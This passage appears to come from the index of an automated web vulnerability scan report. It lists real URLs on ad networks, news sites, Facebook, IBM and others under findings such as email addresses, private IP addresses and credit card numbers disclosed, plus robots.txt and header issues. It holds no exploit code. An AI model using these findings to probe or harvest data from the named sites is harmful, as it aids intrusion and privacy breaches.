
19.14. http://gallery.pictopia.com/

19.15. http://image2.pubmatic.com/

19.16. http://imp.fetchback.com/

19.17. http://mi.adinterax.com/

19.18. http://ping.crowdscience.com/

19.19. http://pixel.33across.com/

19.20. http://puma.vizu.com/

19.21. http://q1.checkm8.com/

19.22. http://qa.n7.vp2.abc.go.com/

19.23. http://rt.legolas-media.com/

19.24. http://sensor2.suitesmart.com/

19.25. http://t.mookie1.com/

19.26. http://track.pubmatic.com/

19.27. http://usadmm.dotomi.com/

19.28. http://widgets.outbrain.com/

19.29. http://www.4info.com/

19.30. http://www.kaltura.com/

19.31. https://www.mailjet.com/

19.32. http://www.tmz.com/

20. Email addresses disclosed

20.1. http://a.abc.com/service/gremlin/js/files/s_code.js

20.2. http://advancedvoip.com/

20.3. http://bostonherald.com/news/regional/view.bg

20.4. http://bostonherald.com/projects/your_tax_dollars.bg

20.5. http://bostonherald.com/track/inside_track/view.bg

20.6. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/

20.7. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx

20.8. http://cache2-scripts.pressdisplay.com/res/services/ResourceManagerHandler.ashx

20.9. http://duckduckgo.com/d.js

20.10. http://dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js

20.11. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

20.12. http://freeradius.org/faq/cistron.html

20.13. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html

20.14. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html

20.15. http://info.mailtraq.com/wac

20.16. http://l.yimg.com/a/combo

20.17. http://livechat.iadvize.com/chat_init.js

20.18. http://mi.adinterax.com/customer/yahoohouse/4/SapientTest/Yahoo_IM/.ob/IM_425x600.flv.hi.video.mp4

20.19. http://vads.adbrite.com/vast/adserver

20.20. http://vads.adbrite.com/vast/adserver

20.21. http://vads.adbrite.com/vast/adserver

20.22. http://vads.adbrite.com/vast/adserver

20.23. http://vads.adbrite.com/vast/adserver

20.24. http://vads.adbrite.com/vast/adserver

20.25. http://vads.adbrite.com/vast/adserver

20.26. http://vads.adbrite.com/vast/adserver

20.27. http://vads.adbrite.com/vast/adserver

20.28. http://www-01.ibm.com/support/docview.wss

20.29. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html

20.30. http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html

20.31. http://www.alepo.com/javascript/validation.js

20.32. http://www.aradial.com/

20.33. http://www.aradial.com/aradial-radius-server-billing-corporate.html

20.34. http://www.aradial.com/aradial-radius-server-billing-customers.html

20.35. http://www.aradial.com/aradial-radius-server-billing-home-content.html

20.36. http://www.astac.net/

20.37. http://www.astac.net/js/extjs/adapter/jquery/ext-jquery-adapter.js

20.38. http://www.astac.net/js/extjs/ext-all.js

20.39. http://www.astac.net/js/extjs/resources/css/ext-all.css

20.40. http://www.bradsdeals.com/res/opt/global.js

20.41. http://www.desktone.com/

20.42. http://www.desktone.com/sup/js/lib/colorbox/jquery.colorbox-min.js

20.43. http://www.disenter.com/

20.44. http://www.enstarllc.com/

20.45. http://www.google.com/search

20.46. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.dimensions.min.js

20.47. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.hoverIntent.minified.js

20.48. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

20.49. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

20.50. http://www.itoncommand.com/Awards.aspx

20.51. http://www.itoncommand.com/CaseStudies.aspx

20.52. http://www.itoncommand.com/Downloads.aspx

20.53. http://www.itoncommand.com/GetAQuote.aspx

20.54. http://www.itoncommand.com/Login.aspx

20.55. http://www.itoncommand.com/Products.aspx

20.56. http://www.itoncommand.com/Support.aspx

20.57. http://www.itoncommand.com/WhyIToC.aspx

20.58. http://www.itoncommand.com/demo/xxxx_main.html

20.59. http://www.itoncommand.com/hosteddesktop.aspx

20.60. http://www.kaltura.com//api_v3/index.php

20.61. http://www.matrix42.com/downloads/wp-vdi-demystified/

20.62. http://www.matrix42.com/typo3/sysext/cms/tslib/media/scripts/jsfunc.layermenu.js

20.63. http://www.microsenseindia.com/js/jcarousellite_1.0.1.js

20.64. http://www.mitzmara.com/

20.65. http://www.mitzmara.com/media%20relations.htm

20.66. http://www.open.com.au/cgi-bin/sf.cgi

20.67. http://www.open.com.au/howtobuy.html

20.68. http://www.open.com.au/index.html

20.69. http://www.open.com.au/radiator/

20.70. http://www.open.com.au/radiator/downloads.html

20.71. http://www.open.com.au/radiator/evaluation.html

20.72. http://www.open.com.au/radiator/features.html

20.73. http://www.open.com.au/services.html

20.74. https://www.open.com.au/cgi-bin/sf.cgi

20.75. https://www.open.com.au/onlineorder.php

20.76. http://www.radius-server.com/

20.77. http://www.radius-server.com/products.htm

20.78. http://www.radius-server.net/

20.79. http://www.radius-server.net/aradial-radius-server-billing-customers.html

20.80. http://www.radius-server.net/aradial-radius-server-billing-home-content.html

20.81. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html

20.82. http://www.radius-server.net/aradial-radius-server-billing-partners.html

20.83. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html

20.84. http://www.radius-server.net/blank-inner.html

20.85. http://www.radius-server.net/radius-billing.html

20.86. http://www.radius.cistron.nl/

20.87. http://www.radius.cistron.nl/README.pam

20.88. http://www.spotngo.ca/

20.89. http://www.spotngo.ca/services.htm

20.90. http://www.ted.com/css/global.css

20.91. http://www.teranews.com/faq.html

20.92. https://www.thundernews.com/common/js/common.js

20.93. http://www.usenetserver.com/en/support.php

20.94. http://www.vm.ibm.com/search/search.cgi

20.95. http://www.westhost.com/js/jquery.hoverIntent.js

21. Private IP addresses disclosed

21.1. http://api.facebook.com/restserver.php

21.2. http://beta.abc.go.com/shows/charlies-angels

21.3. http://beta.abc.go.com/shows/charlies-angels/bios

21.4. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french

21.5. http://cdnbakmi.kaltura.com/html5/html5lib/org/mwEmbedLoader.php

21.6. http://external.ak.fbcdn.net/safe_image.php

21.7. http://external.ak.fbcdn.net/safe_image.php

21.8. http://external.ak.fbcdn.net/safe_image.php

21.9. http://external.ak.fbcdn.net/safe_image.php

21.10. http://external.ak.fbcdn.net/safe_image.php

21.11. http://external.ak.fbcdn.net/safe_image.php

21.12. http://external.ak.fbcdn.net/safe_image.php

21.13. http://external.ak.fbcdn.net/safe_image.php

21.14. http://freeradius.org/faq/cistron.html

21.15. http://q1.checkm8.com/adam/detect

21.16. http://q1.checkm8.com/adam/detect

21.17. http://q1.checkm8.com/adam/detect

21.18. http://q1.checkm8.com/adam/detect

21.19. http://q1.checkm8.com/adam/detect

21.20. http://q1.checkm8.com/adam/report

21.21. http://q1digital.checkm8.com/adam/cm8adam_1_call.js

21.22. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css

21.23. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css

21.24. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/tRfGGwGuu8y.css

21.25. http://wiki.freeradius.org/FAQ

21.26. http://www.facebook.com/brandlift.php

21.27. http://www.facebook.com/extern/login_status.php

21.28. http://www.facebook.com/extern/login_status.php

21.29. http://www.facebook.com/extern/login_status.php

21.30. http://www.facebook.com/extern/login_status.php

21.31. http://www.facebook.com/extern/login_status.php

21.32. http://www.facebook.com/extern/login_status.php

21.33. http://www.facebook.com/extern/login_status.php

21.34. http://www.facebook.com/extern/login_status.php

21.35. http://www.facebook.com/extern/login_status.php

21.36. http://www.facebook.com/extern/login_status.php

21.37. http://www.facebook.com/extern/login_status.php

21.38. http://www.facebook.com/extern/login_status.php

21.39. http://www.facebook.com/extern/login_status.php

21.40. http://www.facebook.com/extern/login_status.php

21.41. http://www.facebook.com/extern/login_status.php

21.42. http://www.facebook.com/extern/login_status.php

21.43. http://www.facebook.com/extern/login_status.php

21.44. http://www.facebook.com/extern/login_status.php

21.45. http://www.facebook.com/extern/login_status.php

21.46. http://www.facebook.com/extern/login_status.php

21.47. http://www.facebook.com/plugins/activity.php

21.48. http://www.facebook.com/plugins/activity.php

21.49. http://www.facebook.com/plugins/facepile.php

21.50. http://www.facebook.com/plugins/like.php

21.51. http://www.facebook.com/plugins/like.php

21.52. http://www.facebook.com/plugins/like.php

21.53. http://www.facebook.com/plugins/like.php

21.54. http://www.facebook.com/plugins/like.php

21.55. http://www.facebook.com/plugins/like.php

21.56. http://www.facebook.com/plugins/like.php

21.57. http://www.facebook.com/plugins/like.php

21.58. http://www.facebook.com/plugins/like.php

21.59. http://www.facebook.com/plugins/like.php

21.60. http://www.facebook.com/plugins/like.php

21.61. http://www.facebook.com/plugins/like.php

21.62. http://www.facebook.com/plugins/like.php

21.63. http://www.facebook.com/plugins/like.php

21.64. http://www.facebook.com/plugins/like.php

21.65. http://www.facebook.com/plugins/like.php

21.66. http://www.facebook.com/plugins/like.php

21.67. http://www.facebook.com/plugins/like.php

21.68. http://www.facebook.com/plugins/like.php

21.69. http://www.facebook.com/plugins/like.php

21.70. http://www.facebook.com/plugins/like.php

21.71. http://www.facebook.com/plugins/like.php

21.72. http://www.facebook.com/plugins/like.php

21.73. http://www.facebook.com/plugins/like.php

21.74. http://www.facebook.com/plugins/like.php

21.75. http://www.facebook.com/plugins/like.php

21.76. http://www.facebook.com/plugins/like.php

21.77. http://www.facebook.com/plugins/like.php

21.78. http://www.facebook.com/plugins/likebox.php

21.79. http://www.facebook.com/plugins/likebox.php

21.80. http://www.facebook.com/plugins/likebox.php

21.81. http://www.google.com/sdch/sXoKgwNA.dct

22. Credit card numbers disclosed

22.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml

22.2. http://showadsak.pubmatic.com/AdServer/AdServerServlet

23. Robots.txt file

23.1. http://2912a.v.fwmrm.net/crossdomain.xml

23.2. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js

23.3. http://a.tribalfusion.com/j.ad

23.4. http://abc.go.com/shows/charlies-angels

23.5. http://action.media6degrees.com/orbserv/hbpix

23.6. http://ad.afy11.net/ad

23.7. http://ad.auditude.com/adserver

23.8. http://ad.turn.com/server/ads.js

23.9. http://ad.yieldmanager.com/pixel

23.10. http://adm.fwmrm.net/crossdomain.xml

23.11. http://ads.bluelithium.com/pixel

23.12. http://adserver.teracent.net/tase/ad

23.13. http://alerts.4info.com/alert/ads/dispatcher.jsp

23.14. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php

23.15. http://api.bizographics.com/v2/profile.redirect

23.16. http://api.facebook.com/restserver.php

23.17. http://as.casalemedia.com/j

23.18. http://as1.suitesmart.com/99917/G15493.js

23.19. http://at.amgdgt.com/ads/

23.20. http://attwireless-www.baynote.net/baynote/tags3/common

23.21. http://b.voicefive.com/b

23.22. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

23.23. http://beta.abc.go.com/shows/charlies-angels

23.24. http://bh.heraldinteractive.com/includes/processAds.bg

23.25. http://bigapple.contextuads.com/fc/go2.php

23.26. http://bostonherald.com/news/regional/view.bg

23.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.28. http://c.betrad.com/a/n/44/546.js

23.29. http://c.brightcove.com/services/viewer/federated_f9

23.30. http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css

23.31. http://cdn.abc.go.com/crossdomain.xml

23.32. http://cdn.gigya.com/JS/gigya.js

23.33. http://cdn.kaltura.com/crossdomain.xml

23.34. http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf

23.35. http://cdn.media.abc.go.com/m/images/global/generic/logo.png

23.36. http://cdn.optmd.com/V2/80181/197812/index.html

23.37. http://cdn.turn.com/server/ddc.htm

23.38. http://cdnbakmi.kaltura.com/p/591531/sp/59153100/flash/kdp3/v3.5.17.6/kdp3.swf

23.39. http://cheetah.vizu.com/a.gif

23.40. http://cim.meebo.com/cim

23.41. http://clk.atdmt.com/go/335787632/direct

23.42. http://cm.g.doubleclick.net/pixel

23.43. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848

23.44. http://d14.zedo.com/ads6/d/3853/172/951/0/2/i.js

23.45. http://d7.zedo.com/img/bh.gif

23.46. http://dp.33across.com/ps/

23.47. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js

23.48. http://g-pixel.invitemedia.com/gmatcher

23.49. http://g.ca.bid.invitemedia.com/pubm_imp

23.50. http://g2.gumgum.com/services/get

23.51. http://gallery.pictopia.com/bostonherald/

23.52. http://gscounters.gigya.com/gs/api.ashx

23.53. http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Monster_RON_728x90/Monster_728x90_FINAL.swf/1297456388

23.54. http://imp.fetchback.com/serve/fb/adtag.js

23.55. http://ll.static.abc.com/m/vp2/sfp/prod/v1.0.0/js/abc/sfp2.js

23.56. http://load.exelator.com/load/

23.57. http://loadm.exelator.com/load/

23.58. http://log.go.com/log

23.59. http://map.media6degrees.com/orbserv/aopix

23.60. http://metrics.tmz.com/b/ss/wbrostmz/1/H.20.3/s31416852392721

23.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75

23.62. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853

23.63. http://odb.outbrain.com/utils/ping.html

23.64. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

23.65. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.755902.s1.v4.ipv6-exp.l.google.com/gen_204

23.66. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

23.67. http://pixel.33across.com/ps/517389/

23.68. http://pixel.invitemedia.com/data_sync

23.69. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml

23.70. http://puma.vizu.com/cdn/00/00/23/91/smart_tag.js

23.71. http://q1.checkm8.com/adam/detect

23.72. http://qa.n7.vp2.abc.go.com/crossdomain.xml

23.73. http://r.casalemedia.com/j.gif

23.74. http://r.turn.com/r/beacon

23.75. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

23.76. http://r1.zedo.com/log/ERR.gif

23.77. http://rds.yahoo.com/b.gif

23.78. http://rt.legolas-media.com/lgrt

23.79. http://rt1302.infolinks.com/crossdomain.xml

23.80. http://rt1701.infolinks.com/crossdomain.xml

23.81. http://rt1702.infolinks.com/crossdomain.xml

23.82. http://rt1803.infolinks.com/crossdomain.xml

23.83. http://rt1804.infolinks.com/static/blank.html

23.84. http://rt1903.infolinks.com/crossdomain.xml

23.85. http://s0.2mdn.net/2906542/11dvm_quiltednorthern_banners_300x250.swf

23.86. http://sana.newsinc.com/sana.html

23.87. http://search.yahoo.com/search

23.88. http://segment-pixel.invitemedia.com/pixel

23.89. http://sensor2.suitesmart.com/sensor4.js

23.90. http://servedby.flashtalking.com/imp/3/16718

23.91. http://site.abc.go.com/crossdomain.xml

23.92. http://spe.atdmt.com/ds/WURTCBIOGTYS/TYS_WayneDeepa_Banner/TYS219_WayneDeepa_300x250.swf

23.93. http://static-gallery.pictopia.com.edgesuite.net/providerasset/1081/bherald_style.css

23.94. http://stats.kaltura.com/crossdomain.xml

23.95. http://traffic.outbrain.com/network/redir

23.96. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/

23.97. http://us.adserver.yahoo.com/a

23.98. http://usadmm.dotomi.com/dmm/servlet/dmm

23.99. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674

23.100. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

23.101. http://www.4info.com/js/auto_jump.js

23.102. http://www.att.com/u-verse/availability/

23.103. http://www.bostonherald.com/news/

23.104. http://www.bradsdeals.com/dealsoftheday/subscribe/b

23.105. http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu

23.106. http://www.meebo.com/cim/sandbox.php

23.107. http://www.tmz.com/

24. Cacheable HTTPS response

24.1. https://admin.usenetbinaries.com/cgi-bin/signup

24.2. https://admin.usenetbinaries.com/favicon.ico

24.3. https://www.easynews.com/signup/lookit.phtml

24.4. https://www.giganews.com/favicon.ico

24.5. https://www.giganews.com/images/fonts/museo_slab_500-webfont.woff

24.6. https://www.giganews.com/images/fonts/museo_slab_500italic-webfont.woff

24.7. https://www.giganews.com/images/fonts/museosans_500-webfont.woff

24.8. https://www.mailjet.com/signup

24.9. https://www.open.com.au/cgi-bin/sf.cgi

24.10. https://www.open.com.au/favicon.ico

24.11. https://www.open.com.au/onlineorder.php

24.12. https://www.open.com.au/style/osc

24.13. https://www.thundernews.com/favicon.ico

25. Multiple content types specified

26. HTML does not specify charset

26.1. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9

26.2. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106

26.3. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10

26.4. http://ad.doubleclick.net/pfadx/tmz_cim/

26.5. http://ad.yieldmanager.com/iframe3

26.6. http://advancedvoip.com/favicon.ico

26.7. http://advancedvoip.com/images/voip_billing_solution_partner_bp.jpg

26.8. http://aud.pubmatic.com/AdServer/Artemis

26.9. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

26.10. http://bgs-soft.com/Products_Sgagent.html

26.11. http://bgs-soft.com/sgagent/

26.12. http://bh.heraldinteractive.com/includes/processAds.bg

26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.14. http://ca.rtb.prod2.invitemedia.com/build_creative

26.15. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848

26.16. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html

26.17. http://freeradius.org/

26.18. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

26.19. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

26.20. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.21. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91

26.22. http://odb.outbrain.com/utils/ping.html

26.23. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

26.24. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

26.25. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

26.26. http://pixel.invitemedia.com/data_sync

26.27. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtalks_maincontent.gif

26.28. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtemplate.gif

26.29. http://sana.newsinc.com/sana.html

26.30. http://search.alepo.com/img/onebyone.gif

26.31. http://secure-us.imrworldwide.com/cgi-bin/m

26.32. http://secure-us.imrworldwide.com/ocr/e

26.33. http://sensor2.suitesmart.com/sensor4.js

26.34. http://showadsak.pubmatic.com/AdServer/AdServerServlet

26.35. http://squirrelmail.org/sflogo.html

26.36. http://static.scanscout.com/optout/iframe.html

26.37. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf

26.38. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782

26.39. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html

26.40. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html

26.41. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet

26.42. http://uac.advertising.com/wrapper/aceUACping.htm

26.43. http://widgets.mobilelocalnews.com/

26.44. http://www-03.ibm.com/innovation/us/watson/

26.45. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/index.html

26.46. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/smarter-answers-for-a-smarter-planet.html

26.47. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html

26.48. http://www.advancedvoip.com/favicon.ico

26.49. http://www.advancedvoip.com/images/voip_billing_solution_partner_bp.jpg

26.50. http://www.alepo.com/isp-billing.shtml

26.51. http://www.alepo.com/radius-server.shtml

26.52. http://www.alepo.com/wifi.shtml

26.53. http://www.aradial.com/

26.54. http://www.aradial.com/aradial-radius-server-billing-corporate.html

26.55. http://www.aradial.com/aradial-radius-server-billing-customers.html

26.56. http://www.aradial.com/aradial-radius-server-billing-home-content.html

26.57. http://www.aradial.com/favicon.ico

26.58. http://www.att.com/navservice/navservlet

26.59. http://www.bostonheraldineducation.com/blog-posts.php

26.60. http://www.bostonheraldineducation.com/favicon.ico

26.61. http://www.courier-mta.org/imap/header.html

26.62. http://www.desktone.com/free_trial

26.63. http://www.disenter.com/disenter.css

26.64. http://www.disenter.com/favicon.ico

26.65. https://www.easynews.com/signup/lookit.phtml

26.66. http://www.elfqrin.com/hacklab/pages/nntpserv.php

26.67. http://www.ibm.com/ibm100/us/en/icons/v17-hp.html

26.68. http://www.itoncommand.com/demo/xxxx_main.html

26.69. http://www.radius-server.net/

26.70. http://www.radius-server.net/aradial-radius-server-billing-customers.html

26.71. http://www.radius-server.net/aradial-radius-server-billing-home-content.html

26.72. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html

26.73. http://www.radius-server.net/aradial-radius-server-billing-partners.html

26.74. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html

26.75. http://www.radius-server.net/blank-inner.html

26.76. http://www.radius-server.net/radius-billing.html

26.77. http://www.radius.cistron.nl/

26.78. http://www.radius.cistron.nl/faq/

26.79. http://www.spotngo.ca/

26.80. http://www.spotngo.ca/services.htm

26.81. http://www.vm.ibm.com/favicon.ico

26.82. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp

27. HTML uses unrecognised charset

27.1. http://js-kit.com/api/session/refresh.js

27.2. http://www.tmz.com/

27.3. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

27.4. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

27.5. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

27.6. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

27.7. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

27.8. http://www.tmz.com/reset-password/

27.9. http://www.tmz.com/signin/

27.10. http://www.toofab.com/

27.11. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

27.12. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

27.13. http://www.toofab.com/category/celeb-couples/

27.14. http://www.toofab.com/news/

28. Content type incorrectly stated

28.1. http://a1.interclick.com/getInPageJS.aspx

28.2. http://a1.interclick.com/getInPageJSProcess.aspx

28.3. http://ad.doubleclick.net/pfadx/tmz_cim/

28.4. https://admin.usenetbinaries.com/favicon.ico

28.5. http://adserver.teracent.net/tase/ad

28.6. http://advancedvoip.com/images/VoIP_white_papers.jpg

28.7. http://advancedvoip.com/images/VoIP_white_papers_up.jpg

28.8. http://advancedvoip.com/images/voip_billing_company.jpg

28.9. http://advancedvoip.com/images/voip_billing_company_contact.jpg

28.10. http://advancedvoip.com/images/voip_billing_company_contact_p.jpg

28.11. http://advancedvoip.com/images/voip_billing_company_p.jpg

28.12. http://advancedvoip.com/images/voip_billing_enterprise_solution.jpg

28.13. http://advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg

28.14. http://advancedvoip.com/images/voip_billing_products.jpg

28.15. http://advancedvoip.com/images/voip_billing_products_p.jpg

28.16. http://advancedvoip.com/images/voip_billing_provider.jpg

28.17. http://advancedvoip.com/images/voip_billing_provider_p.jpg

28.18. http://ar.voicefive.com/b/rc.pli

28.19. http://attwireless-www.baynote.net/baynote/tags3/common

28.20. http://aud.pubmatic.com/AdServer/Artemis

28.21. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

28.22. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

28.23. http://blekko.com/autocomplete

28.24. http://bostonherald.com/edge/includes/twitter.inc

28.25. http://bostonherald.com/news/includes/twitter.inc

28.26. http://bostonherald.com/projects/payroll_ajax_api.bg

28.27. http://bostonherald.com/track/includes/twitter.inc

28.28. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx

28.29. http://bostonheraldnie.newspaperdirect.com/epaper/Services/ImgGalleryHandler.ashx

28.30. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.31. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848

28.32. http://cpanel.app9.hubspot.com/salog.js.aspx

28.33. http://duckduckgo.com/d.js

28.34. http://event.adxpose.com/event.flow

28.35. http://goku.brightcove.com/1pix.gif

28.36. http://helpdocs.westserver.net/v3/sitemanager/whstart.ico

28.37. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard

28.38. http://imp.fetchback.com/serve/fb/adtag.js

28.39. http://livechat.iadvize.com/rpc/referrer.php

28.40. http://members.westhost.com/favicon.ico

28.41. http://network.realmedia.com/favicon.ico

28.42. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.43. http://oascentral.bostonherald.com/favicon.ico

28.44. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090

28.45. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27

28.46. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7

28.47. http://ping.crowdscience.com/ping.js

28.48. http://ps2.newsinc.com/Playlist/show/90017/1564/1252.xml

28.49. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml

28.50. http://rt1302.infolinks.com/action/doq.htm

28.51. http://rt1302.infolinks.com/action/getads.htm

28.52. http://rt1701.infolinks.com/action/doq.htm

28.53. http://rt1702.infolinks.com/action/doq.htm

28.54. http://rt1803.infolinks.com/action/doq.htm

28.55. http://rt1901.infolinks.com/action/doq.htm

28.56. http://rt1903.infolinks.com/action/doq.htm

28.57. http://sales.liveperson.net/hcp/html/mTag.js

28.58. http://sensor2.suitesmart.com/sensor4.js

28.59. http://showadsak.pubmatic.com/AdServer/AdServerServlet

28.60. http://site.abc.go.com/_lib/getCountry

28.61. http://sr2.liveperson.net/hcp/html/mTag.js

28.62. http://stats.kaltura.com//api_v3/index.php

28.63. http://thumbnail.newsinc.com/23529280.sf.jpg

28.64. http://thumbnail.newsinc.com/23529394.sf.jpg

28.65. http://usenetjunction.com/scripts/track.php

28.66. http://www-03.ibm.com/innovation/us/watson/javascripts/pulse.js

28.67. http://www-146.ibm.com/nfluent/transwidget/tw.jsp

28.68. http://www.advancedvoip.com/images/VoIP_white_papers.jpg

28.69. http://www.advancedvoip.com/images/VoIP_white_papers_up.jpg

28.70. http://www.advancedvoip.com/images/voip_billing_company.jpg

28.71. http://www.advancedvoip.com/images/voip_billing_company_contact.jpg

28.72. http://www.advancedvoip.com/images/voip_billing_company_contact_p.jpg

28.73. http://www.advancedvoip.com/images/voip_billing_company_p.jpg

28.74. http://www.advancedvoip.com/images/voip_billing_enterprise_solution.jpg

28.75. http://www.advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg

28.76. http://www.advancedvoip.com/images/voip_billing_products.jpg

28.77. http://www.advancedvoip.com/images/voip_billing_products_p.jpg

28.78. http://www.advancedvoip.com/images/voip_billing_provider.jpg

